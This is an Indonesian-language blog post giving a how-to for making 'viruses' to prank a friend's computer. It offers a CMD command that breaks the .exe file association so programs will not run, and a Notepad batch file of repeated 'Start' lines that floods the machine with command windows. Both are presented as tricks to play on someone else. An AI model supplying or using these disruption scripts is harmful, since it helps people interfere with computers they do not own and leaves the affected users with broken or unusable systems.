Lovaneo On Selasa, 04 Oktober 2016 0 Comments

CARA MEMBUAT VIRUS DI NOTEPAD & CMD


1.Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exetidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik "ASSOC.exe=EXEFILE" trikini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng.

2. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : ------

Start

Start

Start

Start

Start

Start

Start

Start

Start

Start

Start

Start

Nah, selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan membuka CMD yang banyak jika file"eror.bat" itu di buka.

itu dulu guys cara buat virusnya, capek ngetiknya heheeh  kapan kapan ntar gua upload lagi....

0 komentar:

Posting Komentar